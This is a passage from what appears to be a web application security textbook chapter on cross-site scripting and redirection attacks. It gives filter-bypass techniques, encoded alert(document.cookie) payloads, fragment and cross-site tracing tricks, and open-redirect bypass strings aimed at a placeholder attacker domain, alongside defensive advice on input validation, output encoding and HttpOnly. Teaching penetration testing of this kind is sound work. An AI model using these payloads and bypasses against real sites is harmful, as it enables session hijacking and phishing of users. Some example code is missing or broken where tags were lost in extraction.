some situations, is to “convert” a reflected XSS flaw into a DOM-based vul-

nerability. For example, in the original reflected XSS vulnerability, if the appli-

cation places a length restriction on the

message parameter that is copied into

412 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 412

the returned page, you can inject the following 46-byte script, which evaluates

the fragment string in the current URL:

By injecting this script into the parameter that is vulnerable to reflected XSS,

you can effectively induce a DOM-based XSS vulnerability in the resulting

page and thus execute a second script located within the fragment string,

which is outside the control of the application’s filters and may be arbitrarily

long. For example:

https://wahh-app.com/error.php?message=

here ......’)

Modifying the Request Method

In complex applications that employ a large number of forms, it is common to

find several reflected XSS vulnerabilities within

POST requests, where the vul-

nerable parameter is submitted within the body of an HTTP message. In these

cases, it is always worth verifying whether the application handles the request

in the same way if it is converted to a

GET request. Most applications will tol-

erate requests in either form.

To perform this check, simply change the method of your crafted request

from

POST to GET, move the message body into the URL query string (inserting

an additional

& if a query string is already present), and remove the Content-

Length

header. You can use the Change Request Method action in Burp Proxy

to perform these tasks for you.

Test the new request, and if your XSS payload is still executed, then you can

simply use the URL from the

GET request as your attack vector. This makes fea-

sible a wider range of attack delivery mechanisms and, therefore, increases the

significance of the vulnerability in some contexts.

COMMON MYTH “This XSS bug isn’t exploitable. I can’t get my attack to

work as a GET request.”

If a reflected XSS flaw can only be exploited using the POST method, the

application is still vulnerable to various attack delivery mechanisms, including

ones that employ a malicious third-party web site.

In some situations, converting an attack that uses the GET method into one

that uses the

POST method may enable you to bypass certain filters. Many

applications perform some generic application-wide filtering of requests for

Chapter 12 ■ Attacking Other Users 413

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 413

known attack strings. If an application expects to receive requests using the

GET method, it may perform this filtering on the URL query string only. By con-

verting a request to use the

POST method, you may be able to bypass this filter

entirely.

Using Nonstandard Content Encoding

In some situations, you can employ a very powerful means of bypassing many

types of filter, by causing the application to accept a nonstandard encoding of

your attack payload.

The following examples show some representations of the string

UTF-7:

+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

US-ASCII:

BC 73 63 72 69 70 74 BE 61 6C 65 72 74 28 64 6F ; ¼script¾alert(do

63 75 6D 65 6E 74 2E 63 6F 6F 6B 69 65 29 BC 2F ; cument.cookie)¼/

73 63 72 69 70 74 BE ; script¾

UTF-16:

FF FE 3C 00 73 00 63 00 72 00 69 00 70 00 74 00 ; ÿþ<.s.c.r.i.p.t.

3E 00 61 00 6C 00 65 00 72 00 74 00 28 00 64 00 ; >.a.l.e.r.t.(.d.

6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 2E 00 ; o.c.u.m.e.n.t...

63 00 6F 00 6F 00 6B 00 69 00 65 00 29 00 3C 00 ; c.o.o.k.i.e.).<.

2F 00 73 00 63 00 72 00 69 00 70 00 74 00 3E 00 ; /.s.c.r.i.p.t.>.

These encoded strings will bypass many common anti-XSS filters – the UTF-7

and US-ASCII encodings enable you to avoid the

< and > characters that are

often sanitized, and the UTF-16 encoding does not contain any common black-

list expressions such as

<script.

Today’s browsers will not by default automatically recognize nonstandard

encodings, and so the encoding type must be explicitly specified using the

charset attribute of the HTTP Content-Type header, or its corresponding

HTML meta tag. If you can control either of these locations, then you may be

able to use nonstandard encoding to bypass the application’s filters, and cause

the browser to interpret your payload in the way you require. In some appli-

cations, a

charset parameter is actually submitted in certain requests,

enabling you to directly set the encoding type specified in the application’s

response.

414 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 414

TIP One qualification to the point about auto-detection of content encoding

is that Internet Explorer tolerates null bytes appearing within HTML, and in

most cases simply ignores them. Provided that URL-encoded null bytes (%00)

get returned by the application as actual null bytes, you can often use UTF-16

encoding as an easy way of wrapping your XSS payloads in order to bypass

pattern-based filters, regardless of the Content-Type header being returned

by the server. For example, in the original reflected XSS vulnerability, the

following attack using a UTF-16 encoded payload is effective against Internet

Explorer:

https://wahh-app.com/error.php?message=%FF%FE%3C%00%73%00%63%00%72%

00%69%00%70%00%74%00%3E%00%61%00%6C%00%65%00%72%00%74%00%28%00%64%00%

6F%00%63%00%75%00%6D%00%65%00%6E%00%74%00%2E%00%63%00%6F%00%6F%00%6B%

00%69%00%65%00%29%00%3C%00%2F%00%73%00%63%00%72%00%69%00%70%00%74%00%

3E%00

Because Internet Explorer ignores the nulls, it effectively auto-decodes your

payload, causing the original attack to execute.

Finding and Exploiting Stored XSS Vulnerabilities

The process of identifying stored XSS vulnerabilities overlaps substantially

with that described for reflected XSS, and includes submitting a unique string

as every parameter to every page. However, there are some important differ-

ences which you must keep in mind to maximize the number of vulnerabilities

identified.

HACK STEPS

■ Having submitted a unique string to every possible location within the

application, it is necessary to review the entire content and functionality

of the application once more to identify any instances where this string

is displayed back to the browser. User-controllable data entered in one

location (for example, a name field on a personal information page) may

be displayed in numerous different places throughout the application

(for example, on the user’s home page, in a listing of registered users, in

workflow items such as tasks, on other users’ contact lists, in messages

or questions posted by the user, in application logs, etc). Each appear-

ance of the string may be subject to different protective filters, and so

needs to be investigated separately.

Continued

Chapter 12 ■ Attacking Other Users 415

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 415

416 Chapter 12 ■ Attacking Other Users

HACK STEPS (CONTINUED)

■ If possible, all areas of the application accessible by administrators

should be reviewed to identify the appearance of any data controllable

by non-administrative users. For example, the application may allow

administrators to review log files in-browser. It is extremely common for

this type of functionality to contain XSS vulnerabilities that an attacker

can exploit by generating log entries containing malicious HTML.

■ When submitting a test string to each location within the application, it is

not always sufficient simply to post it as each parameter to each page.

Many application functions need to be followed through several stages

before the submitted data is actually stored. For example, actions like

registering a new user, placing a shopping order, and making a funds

transfer often involve submitting several different requests in a defined

sequence. To avoid missing any vulnerabilities, it is necessary to see each

test case through to completion.

■ When probing for reflected XSS, you are interested in every aspect of a

victim’s request that you can control. This includes all parameters to the

request, and also every HTTP header, because these can be controlled

using a crafted Flash object. In the case of stored XSS, you should also

investigate any out-of-band channels through which the application

receives and processes input that you can control. Any such channels

are suitable attack vectors for introducing stored XSS attacks. Review the

output of your application mapping exercises (see Chapter 4) to identify

every possible area of attack surface.

■ If the application allows files to be uploaded and downloaded, always

probe this functionality for stored XSS attacks. If the application allows

HTML or text files, and does not validate or sanitize their contents, then

it is almost certainly vulnerable. If it allows JPEG files and does not vali-

date that they contain valid images, then it is probably vulnerable to

attacks against Internet Explorer users. Test the application’s handling of

each file type that it supports, and confirm how browsers handle

responses containing HTML instead of the normal content type.

■ Think imaginatively about any other possible means by which data you

control may be stored by the application and displayed to other users.

For example, if the application search function shows a list of popular

search items, you may be able to introduce a stored XSS payload by

searching for it numerous times, even though the primary search func-

tionality itself handles your input safely.

When you have identified every instance in which user-controllable data is

stored by the application and later displayed back to the browser, you should fol-

low the same process described previously for investigating potential reflected

XSS vulnerabilities — that is, determine what input needs to be submitted to

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 416

embed valid JavaScript within the surrounding HTML and then attempt to cir-

cumvent any filters which interfere with the processing of your attack

payload.

TIP When probing for reflected XSS, it is trivial to identify which request

parameters are potentially vulnerable, by testing one parameter at a time and

reviewing each response for any appearance of your input. With stored XSS,

however, this may be less straightforward. If you submit the same test string as

every parameter to every page, then you may find this string reappearing at

multiple locations within the application, and it may not be clear from the

context precisely which parameter is responsible for the appearance. To avoid

this problem, you can submit a different test string as every parameter when

probing for stored XSS flaws — for example, by concatenating your unique

string with the name of the field it is being submitted to.

Finding and Exploiting DOM-Based XSS Vulnerabilities

DOM-based XSS vulnerabilities cannot be identified by submitting a unique

string as each parameter and monitoring responses for the appearance of that

string.

One basic method for identifying DOM-based XSS bugs is to manually walk

through the application with your browser, and modify each URL parameter

to contain a standard test string such as the following:

“<script>alert(document.cookie)</script>

By actually displaying each returned page in your browser, you will cause

all client-side scripts to execute, referencing your modified URL parameter

where applicable. Any time a dialog box appears containing your cookies, you

will have found a vulnerability (which may be either DOM-based or standard

reflected XSS). This process could even be automated by a tool which imple-

mented its own JavaScript interpreter.

However, this basic approach will not identify all DOM-based XSS bugs. As

you have already seen, the precise syntax required to inject valid JavaScript

into an HTML document depends upon the syntax that already appears before

and after the point where the user-controllable string gets inserted. It may be

necessary to terminate a single- or double-quoted string or to close specific

tags. Sometimes, new tags may be required, but sometimes not. The applica-

tion may modify your input in various ways and yet may still be vulnerable.

If the standard test string does not happen to result in valid syntax when it

is processed and inserted, then the embedded JavaScript will not execute and

so no dialog will appear, even though the application may be vulnerable to a

Chapter 12 ■ Attacking Other Users 417

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 417

418 Chapter 12 ■ Attacking Other Users

properly crafted attack. Short of submitting every conceivable XSS attack

string into every parameter, the basic approach will inevitably miss a large

number of vulnerabilities.

A more effective approach to identifying DOM-based XSS bugs is to review

all client-side JavaScript for any use of DOM properties that may lead to a

vulnerability.

HACK STEPS

Using the results of your application mapping exercises (see Chapter 4), review

every piece of client-side JavaScript for the following APIs, which may be used

to access DOM data that is controllable via a crafted URL:

■ document.location

■ document.URL

■ document.URLUnencoded

■ document.referrer

■ window.location

Be sure to include scripts that appear in static HTML pages as well as

dynamically generated pages — DOM-based XSS bugs may exist in any location

where client-side scripts are used, regardless of the type of page or whether

you see parameters being submitted to the page.

In every instance where one of the preceding APIs is being used, closely

review the code to identify what is being done with the user-controllable data,

and whether crafted input could be used to cause execution of arbitrary

JavaScript. In particular, review and test any instance where your data is being

passed to any of the following APIs:

■ document.write()

■ document.writeln()

■ document.body.innerHtml

■ eval()

■ window.execScript()

■ window.setInterval()

■ window.setTimeout()

As with reflected and stored XSS, you may find that the application imple-

ments filters that block requests containing certain malicious strings. Even

though the vulnerable operation occurs on the client, and the server does not

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 418

return the user-supplied data in its response, the URL is still submitted to the

server, and so the application may validate the data and fail to return the vul-

nerable client-side script when a malicious payload is detected.

If this defense is encountered, you should attempt each of the potential fil-

ter bypasses that were described previously for reflected XSS vulnerabilities,

to test the robustness of the server’s validation. In addition to these attacks,

there are several techniques unique to DOM-based XSS bugs that may enable

your attack payload to evade server-side validation.

When client-side scripts extract a parameter’s value from the URL, they

very rarely parse the query string properly into name/value pairs. Instead,

they typically search the URL for the parameter name followed by the

= sign,

and then extract whatever comes next, up until the end of the URL. This

behavior can be exploited in two ways:

■■

If the server’s validation logic is being applied on a per-parameter

basis, rather than on the entire URL, then the payload can be placed

into an invented parameter appended after the vulnerable parameter.

For example:

https://wahh-app.com/error.php?message=Sorry%2c+an+error+occurred&

foo=<script>alert(document.cookie)</script>

Here, the invented parameter is ignored by the server and so is not sub-

ject to any filtering. However, because the client-side script searches the

query string for

message= and extracts everything following this, it will

include your payload in the string which it processes.

■■

If the server’s validation logic is being applied to the entire URL, and

not just to the message parameter, it may still be possible to evade the

filter by placing the payload to the right of the HTML fragment charac-

ter

#. For example:

https://wahh-app.com/error.php?message=Sorry%2c+an+error+

occurred#<script>alert(document.cookie)</script>

Here, the fragment string is still part of the URL, and so is stored in the

DOM and will be processed by the vulnerable client-side script. How-

ever, because browsers do not submit the fragment portion of the URL

to the server, the attack string will not even be sent to the server, and so

cannot be blocked by any kind of server-side filter. Because the client-

side script extracts everything after

message=, the payload is still copied

into the HTML page source.

Chapter 12 ■ Attacking Other Users 419

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 419

COMMON MYTH “We check every user request for embedded script tags,

so no XSS attacks are possible.”

Aside from the question of whether any filter bypasses are possible, you have

now seen three reasons why this claim can be incorrect:

■■

In some XSS flaws, the attacker-controllable data is being inserted

directly into an existing JavaScript context, and so there is no need to

use either script tags or the javascript: protocol. In other cases, you

can inject an event hander containing JavaScript without using any

script tags.

■■

If an application receives data via some out-of-band channel and

renders this within its web interface, then any stored XSS bugs can be

exploited without submitting any malicious payload using HTTP.

■■

Attacks against DOM-based XSS may not involve submitting any

malicious payload to the server. If the fragment technique is used, the

payload remains on the client at all times.

Some applications employ a more sophisticated client-side script that per-

forms stricter parsing of the query string — for example, it may search the

URL for the parameter name followed by the

= sign, but then extract what fol-

lows only until it reaches a relevant delimiter such as

& or #. In this case, the

two attacks described previously could be modified as follows:

https://wahh-app.com/error.php?foomessage=<script>alert(document.cookie)

</script>&message=Sorry%2c+an+error+occurred

https://wahh-app.com/error.php#message=<script>alert(document.cookie)

</script>

In both cases, the first match for message= is followed immediately by the

attack string, without any intervening delimiter, and so the payload is

processed and copied into the HTML page source.

In some cases, you may find that very complex processing is performed on

DOM-based data, and it is difficult to trace all of the different paths taken by

user-controllable data, and all of the manipulation being performed, solely

through static review of the JavaScript source code. In this situation, it can be

very beneficial to use a JavaScript debugger to monitor the script’s execution

dynamically. The FireBug extension to the Firefox browser is a full-fledged

debugger for client-side code and content, which enables you to set break-

points and watches on interesting code and data, making the task of under-

standing a complex script considerably easier.

420 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 420

COMMON MYTH “We’re safe. Our web application scanner didn’t find any

XSS bugs.”

As you will see in Chapter 19, some web applications scanners do a reasonable

job of finding common flaws, including XSS. However, it should be evident at

this point that many XSS vulnerabilities are subtle to detect, and creating a

working exploit can require extensive probing and experimentation. At the

present time, no automated tools are capable of reliably identifying all of

these bugs.

HttpOnly Cookies and Cross-Site Tracing

As you have seen, one of the various payloads for attacking XSS vulnerabili-

ties is to capture a victim’s session token by using injected JavaScript to access

the

document.cookie property. HttpOnly cookies are a defense mechanism

supported by some browsers and employed by some applications in an

attempt to prevent this attack payload from succeeding.

When an application sets a cookie, it can be flagged as

HttpOnly in the

Set-Cookie header:

Set-Cookie: SessId=12d1a1f856ef224ab424c2454208ff; HttpOnly;

When a cookie is flagged in this way, supporting browsers will prevent

client-side JavaScript from directly accessing the cookie. Although the browser

will still submit the cookie in the HTTP headers of requests, it will not be

included in the string returned by

document.cookie. Hence, using HttpOnly

cookies can help to prevent an attacker from using XSS flaws to perform ses-

sion hijacking attacks.

NOTE HttpOnly cookies have no effect on any of the various other attack

payloads that XSS flaws can be used to deliver. For example, the attack of

inducing compromised users to perform an arbitrary action, as employed in the

MySpace worm, is unaffected. Not all browsers support HttpOnly cookies,

meaning that they cannot always be relied upon to be effective. Further, as

described next, in some circumstances session hijacking is still possible even

when HttpOnly cookies are used.

Cross-site tracing (or XST) is an attack technique that in some circumstances

can bypass the protection offered by

HttpOnly cookies, and enable client-side

JavaScript to gain access to the values of cookies flagged as

HttpOnly.

The technique uses the HTTP

TRACE method, which is designed for diagnos-

tic purposes and is enabled on many web servers by default. When a server

receives a request using the

TRACE method, the defined behavior is for it to

Chapter 12 ■ Attacking Other Users 421

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 421

respond with a message whose body contains the exact text of the TRACE

request that the server received. The reason that this is sometimes of value for

diagnostic purposes is that the request received by a server can be different

from the request sent by a client, because of modifications made by interven-

ing proxies, and so on. The method can be used to determine what changes are

being made to the request between client and server.

Browsers submit all cookies in HTTP requests, including requests that use

the

TRACE method, and including cookies flagged as HttpOnly. For example:

TRACE / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, */*

Accept-Language: en-gb,en-us;q=0.5

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET

CLR 1.1.4322)

Host: wahh-app.com

Cookie: SessId=12d1a1f856ef224ab424c2454208ff

HTTP/1.1 200 OK

Date: Thu, 01 Feb 2007 10:59:54 GMT

Server: Apache

Content-Type: message/http

Content-Length: 426

TRACE / HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, */*

Accept-Language: en-gb,en-us;q=0.5

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET

CLR 1.1.4322)

Host: wahh-app.com

Cookie: SessId=12d1a1f856ef224ab424c2454208ff

As you can see, both the request and response contain the cookie that was

flagged as

HttpOnly, and this behavior is what opens the door to XST attacks.

If client-side JavaScript can be used to issue a

TRACE request, and read the

response to that request, then the script will be able to access cookies that are

flagged as

HttpOnly, even though these are not accessible via the

document.cookie property. Of course, the attack will also depend upon some

kind of XSS vulnerability, in order to inject the malicious JavaScript. What the

technique demonstrates is how an attacker who has identified an exploitable

XSS flaw can leverage the

TRACE method to gain access to cookies that are sup-

posed to be unavailable to it. Hence the name of the technique: cross-site

tracing.

In older browsers, XST attacks could be delivered using the

XMLHttpRequest

object that is employed in Ajax applications. For example, in older versions of

422 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 422

Internet Explorer, the following script will make a TRACE request and display

the response in a dialog, including any cookies submitted in the request:

var request = new ActiveXObject(“Microsoft.XMLHTTP”);

request.open(“TRACE”, “https://wahh-app.com”, false);

request.send();

alert(request.responseText);

</script>

Current browsers block TRACE requests using the XMLHttpRequest object,

and XST attacks are no longer viable at the time of this writing.

Preventing XSS Attacks

Despite the various different manifestations of XSS, and the different possibil-

ities for exploitation, preventing the vulnerability itself is in fact conceptually

straightforward. What makes it problematic in practice is the difficulty of iden-

tifying every instance in which user-controllable data is handled in a poten-

tially dangerous way. Any given page of an application may process and

display dozens of items of user data. In addition to the core functionality, there

are error messages and other locations in which vulnerabilities may arise. It is

hardly surprising, therefore, that XSS flaws are so hugely prevalent, even in

the most security-critical applications.

Different types of defense are applicable to reflected and stored XSS on the

one hand, and to DOM-based XSS on the other, because of their different root

causes.

Preventing Reflected and Stored XSS

The root cause of both reflected and stored XSS is that user-controllable data is

copied into application responses without adequate validation and sanitiza-

tion. Because the data is being inserted into the raw source code of an HTML

page, malicious data can interfere with that page, modifying not only its con-

tent but also its structure — breaking out of quoted strings, opening and clos-

ing tags, injecting scripts, and so on.

To eliminate reflected and stored XSS vulnerabilities, the first step is to

identify every instance within the application where user-controllable data is

being copied into responses. This includes data that is copied from the imme-

diate request and also any stored data that originated from any user at any

prior time, including via out-of-band channels. To ensure that every instance

is identified, there is no real substitute for a close review of all application

source code.

Chapter 12 ■ Attacking Other Users 423

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 423

Having identified all of the operations which are potentially at risk of XSS

and which need to be suitably defended, a threefold approach should be taken

to prevent any actual vulnerabilities arising. This approach comprises the fol-

lowing elements:

■■

Validate input.

■■

Validate output.

■■

Eliminate dangerous insertion points.

Validate Input

At the point where the application receives user-supplied data that may be

copied into one of its responses at any future point, the application should per-

form context-dependent validation of this data, in as strict a manner as possi-

ble. Potential features to validate include the following:

■■

That the data is not too long.

■■

That the data only contains a certain permitted set of characters.

■■

That the data matches a particular regular expression.

Different validation rules should be applied as restrictively as possible to

names, email addresses, account numbers, and so on, according to the type of

data that the application is expecting to receive in each field.

Validate Output

At the point where the application copies into its responses any item of data

that originated from some user or third party, this data should be HTML-

encoded to sanitize potentially malicious characters. HTML-encoding

involves replacing literal characters with their corresponding HTML entities.

This ensures that browsers will handle potentially malicious characters in a

safe way, treating them as part of the content of the HTML document and not

part of its structure. The HTML-encodings of the primary problematic charac-

ters are as follows:

“ "

‘ '

& &

< <

> >

In addition to these common encodings, in fact any character can be HTML-

encoded using its numeric ASCII character code, as follows:

% %

* *

424 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 424

ASP applications can use the Server.HTMLEncode API to sanitize common

malicious characters within a user-controllable string, before this is copied into

the server’s response. This API converts the characters

“ & < and > to their cor-

responding HTML entities, and also converts any ASCII character above 0x7f

using the numeric form of encoding.

On the Java platform, there is no equivalent built-in API available; however,

it is simple to construct your own equivalent method using just the numeric

form of encoding. For example:

public static String HTMLEncode(String s)

{

StringBuffer out = new StringBuffer();

for (int i = 0; i < s.length(); i++)

{

char c = s.charAt(i);

if(c > 0x7f || c==’“‘ || c==’&‘ || c==’<’ || c==’>’)

out.append(“&#“ + (int) c + “;”);

else out.append(c);

}

return out.toString();

}

A common mistake made by developers is to HTML-encode only the char-

acters that immediately appear to be of use to an attacker in the specific con-

text. For example, if an item is being inserted into a double-quoted string, the

application might encode only the

“ character; if the item is being inserted

unquoted into a tag, it might encode only the

> character. This approach con-

siderably increases the risk of bypasses being found. As you have seen, an

attacker can often exploit browsers’ tolerance of invalid HTML and JavaScript

to change context or inject code in unexpected ways. Further, it is often possi-

ble to span an attack across multiple controllable fields, exploiting the differ-

ent filtering being employed in each one. A far more robust approach is to

always HTML-encode every character that may be of potential use to an

attacker, regardless of the context where it is being inserted. To provide the

highest possible level of assurance, developers may elect to HTML-encode

every non-alphanumeric character, including whitespace. This approach nor-

mally imposes no measurable overhead on the application, and presents a

severe obstacle to any kind of filter bypass attack.

The reason for combining input validation and output sanitization is that this

involves two layers of defenses, either one of which will provide some protec-

tion if the other one fails. As you have seen, many filters which perform input

and output validation are subject to bypasses. By employing both techniques,

the application gains some additional assurance that an attacker will be defeated

even if one of its two filters is found to be defective. Of the two defenses, the out-

put validation is the most important and is absolutely mandatory. Performing

strict input validation should be viewed as a secondary failover.

Chapter 12 ■ Attacking Other Users 425

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 425

Of course, when devising the input and output validation logic itself, great

care should be taken to avoid any vulnerabilities that lead to bypasses. In par-

ticular, filtering and encoding should be carried out after any relevant canoni-

calization, and the data should not be further canonicalized afterwards. The

application should also ensure that the presence of any null bytes does not

interfere with its validation.

Eliminate Dangerous Insertion Points

There are some locations within the application page where it is just too inher-

ently dangerous to insert user-supplied input, and developers should look for

an alternative means of implementing the desired functionality.

Inserting user-controllable data directly into existing JavaScript should be

avoided wherever possible. When applications attempt to do this safely, it is

frequently possible to bypass their defensive filters. And once an attacker has

taken control of the context of the data he controls, he typically needs to per-

form minimal work to inject arbitrary script commands and so perform mali-

cious actions.

A second location where user input should not be inserted is any other con-

text in which JavaScript commands may appear directly. For example:

In these situations, an attacker can proceed directly to injecting JavaScript

commands within the quoted string. Further, the defense of HTML-encoding

the user data may not be effective, because some browsers will HTML-decode

the contents of the quoted string before this is processed. For example:

A further pitfall to avoid is situations where an attacker can manipulate the

encoding type of the application’s response, either by injecting into a relevant

directive or because the application uses a request parameter to specify the

preferred encoding type. In this situation, input and output filters that are well

designed in other respects may fail because the attacker’s input is encoded in

an unusual form that the filters do not recognize as potentially malicious.

Wherever possible, the application should explicitly specify an encoding type

in its response headers, disallow any means of modifying this, and ensure that

its XSS filters are compatible with it. For example:

Content-Type: text/html; charset=ISO-8859-1

426 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 426

Preventing DOM-Based XSS

The defenses described so far obviously do not apply directly to DOM-based

XSS, because the vulnerability does not involve user-controlled data being

copied into server responses.

Wherever possible, applications should avoid using client-side scripts to

process DOM data and insert it into the page. Because the data being

processed is outside of the server’s direct control, and in some cases even out-

side of its visibility, this behavior is inherently risky.

If it is considered unavoidable to use client-side scripts in this way, DOM-

based XSS flaws can be prevented through two types of defenses, correspond-

ing to the input and output validation described for reflected XSS.

Validate Input

In many situations, applications can perform rigorous validation on the data

being processed. Indeed, this is one area where client-side validation can be

more effective than server-side validation. In the vulnerable example

described earlier, the attack can be prevented by validating that the data about

to be inserted into the document only contains alphanumeric characters and

whitespace. For example:

var a = document.URL;

a = a.substring(a.indexOf(“message=”) + 8, a.length);

a = unescape(a);

var regex=/^([A-Za-z0-9+\s])*$/;

if (regex.test(a))

document.write(a);

</script>

In addition to this client-side control, rigorous server-side validation of URL

data can be employed as a defense-in-depth measure, in order to detect

requests that may contain malicious exploits for DOM-based XSS flaws. In the

same example just described, it would actually be possible for an application

to prevent an attack by employing only server-side data validation, by verify-

ing that:

■■

The query string contains a single parameter.

■■

The parameter’s name is message (case-sensitive check).

■■

The parameter’s value contains only alphanumeric content.

With these controls in place, it would still be necessary for the client-side

script to parse out the value of the

message parameter properly, ensuring that

any fragment portion of the URL was not included.

Chapter 12 ■ Attacking Other Users 427

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 427

Validate Output

As with reflected XSS flaws, applications can perform HTML-encoding of

user-controllable DOM data before this is inserted into the document. This will

enable all kinds of potentially dangerous characters and expressions to be dis-

played within the page in a safe way. HTML encoding can be implemented in

client-side JavaScript with a function like the following:

function sanitize(str)

{

var d = document.createElement(‘div’);

d.appendChild(document.createTextNode(str));

return d.innerHTML;

}

Preventing XST

The XST technique depends upon finding some XSS flaw that allows the

attacker to insert arbitrary JavaScript into a page viewed by another user.

Hence, eliminating all XSS vulnerabilities ought to remove any opportunities

for an attacker to use the technique. Nevertheless, it is recommended both that

all cookies are flagged as

HttpOnly and that the TRACE method is disabled on

the web server hosting the application.

Redirection Attacks

Redirection vulnerabilities arise when an application takes user-controllable

input and uses this to perform a redirection, instructing the user’s browser to

visit a different URL than the one requested. They are usually of less interest to

an attacker than cross-site scripting vulnerabilities, which can be used to per-

form a much wider range of malicious actions. Redirection bugs are primarily

of use in phishing attacks where an attacker seeks to induce a victim to visit a

spoofed web site and enter sensitive details. A redirection vulnerability can

lend credibility to the attacker’s overtures to potential victims, because it

enables him to construct a URL which points to the authentic web site he is tar-

geting, and which is therefore more convincing, but which causes anyone who

visits it to be redirected silently to a web site controlled by the attacker.

In fact, many applications actually perform redirects to third-party sites as

part of their normal function — for example, to process customer payments.

This encourages users to perceive that redirection during a transaction is not

necessarily indicative of anything suspicious. An attacker can take advantage

of this perception when exploiting redirection vulnerabilities.

428 Chapter 12 ■ Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 428

Finding and Exploiting Redirection Vulnerabilities

The first step in locating redirection vulnerabilities is to identify every instance

within the application where a redirect occurs. There are several ways in which

an application can cause the user’s browser to redirect to a different URL:

■■

An HTTP redirect uses a message with a 3xx status code and a Location

header specifying the target of the redirect. For example:

HTTP/1.1 302 Object moved

Location: https://wahh-app.com/showDetails.php?uid=19821

■■

The HTTP Refresh header can be used to reload a page with an arbi-

trary URL after a fixed interval, which may be zero to trigger an imme-

diate redirect. For example:

HTTP/1.1 200 OK

Refresh: 0; url=https://wahh-app.com/showDetails.php?uid=19821

■■

The HTML <meta> tag can be used to replicate the behavior of any

HTTP header and can, therefore, be used for redirection. For example:

HTTP/1.1 200 OK

Content-Length: 125

<html>

<head>

”0;url=https://wahh-app.com/showDetails.php?uid=19821”>

</head>

</html>

■■

Various APIs exist within JavaScript that can be used to redirect the

browser to an arbitrary URL. For example:

HTTP/1.1 200 OK

Content-Length: 120

<html>

<head>

document.location=”https://wahh-app.com/showDetails.php?uid=19821”;

</script>

</head>

</html>

Chapter 12 ■ Attacking Other Users 429

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 429

430 Chapter 12 ■ Attacking Other Users

In each of these cases, an absolute or relative URL may be specified.

HACK STEPS

■ Identify every instance within the application where a redirect occurs.

■ An effective way to achieve this is to walk through the application using

an intercepting proxy, and monitor the requests made for actual pages

(as opposed to other resources like images, style sheets, script files, etc.).

■ If a single navigation action results in more than one request in succes-

sion, investigate what means of performing the redirect is being used.

The majority of redirects are not user-controllable. For example, in a typical

/login.jsp might return an

HTTP redirect to

/myhome.jsp. The target of the redirect is always the same, so

it is not subject to any vulnerabilities involving redirection.

However, in other cases, data supplied by the user is used in some way to

set the target of the redirect. A common instance of this is where an application

forces users whose sessions have expired to return to the login page and then

redirects them back to the original URL following successful reauthentication.

If you encounter this type of behavior, then the application may be vulnerable

to a redirection attack, and you should investigate further to determine

whether the behavior is exploitable.

HACK STEPS

■ If the user data being processed in a redirect contains an absolute URL,

modify the domain name within the URL, and test whether the applica-

tion redirects you to the different domain.

■ If the user data being processed contains a relative URL, modify this into

an absolute URL for a different domain, and test whether the application

redirects you to this domain.

■ In both cases, if you see behavior like the following, then the application

is certainly vulnerable to an arbitrary redirection attack:

GET /redir.php?target=http://wahh-attacker.com/ HTTP/1.1

Host: wahh-app.com

HTTP/1.1 302 Object moved

Location: http://wahh-attacker.com/

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 430

Circumventing Obstacles to Attack

It is very common to encounter situations in which user-controllable data is

being used to form the target of a redirect, but is being filtered or sanitized in

some way by the application, usually in an attempt to block redirection

attacks. In this situation, the application may or may not be vulnerable, and

your next task should be to probe the defenses in place to determine whether

they can be circumvented to perform arbitrary redirection. The two general

types of defense you may encounter are attempts to block absolute URLs, and

the addition of a specific absolute URL prefix.

Blocking of Absolute URLs

The application may check whether the user-supplied string starts with

http://, and if so, then block the request. In this situation, the following tricks

may succeed in causing a redirect to an external web site:

HtTp://wahh-attacker.com

%00http://wahh-attacker.com

http://wahh-attacker.com [note the leading space]

//wahh-attacker.com

%68%74%74%70%3a%2f%2fwahh-attacker.com

%2568%2574%2574%2570%253a%252f%252fwahh-attacker.com

https://wahh-attacker.com

Alternatively, the application may attempt to sanitize absolute URLs by

removing

http:// and any external domain specified. In this situation, any of

the preceding bypasses may be successful, and the following attacks should

also be tested:

http://http://wahh-attacker.com

http://wahh-attacker.com/http://wahh-attacker.com

hthttp://tp://wahh-attacker.com

Sometimes, the application may verify that the user-supplied string either

starts with or contains an absolute URL to its own domain name. In this situa-

tion, the following bypasses may be effective:

http://wahh-app.com.wahh-attacker.com

http://wahh-attacker.com/?http://wahh-app.com

http://wahh-attacker.com/%23http://wahh-app.com

Chapter 12 ■ Attacking Other Users 431

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 431

432 Chapter 12 ■ Attacking Other Users

Addition of an Absolute Prefix

The application may form the target of the redirect by appending the user-

controllable string to an absolute URL prefix. For example:

GET /redir.php?target=/private/admin.php HTTP/1.1

Host: wahh-app.com

HTTP/1.1 302 Object moved

Location: http://wahh-app.com/private/admin.php

In this situation, the application may or may not be vulnerable. If the prefix

used consists of

http:// and the application’s domain name but does not

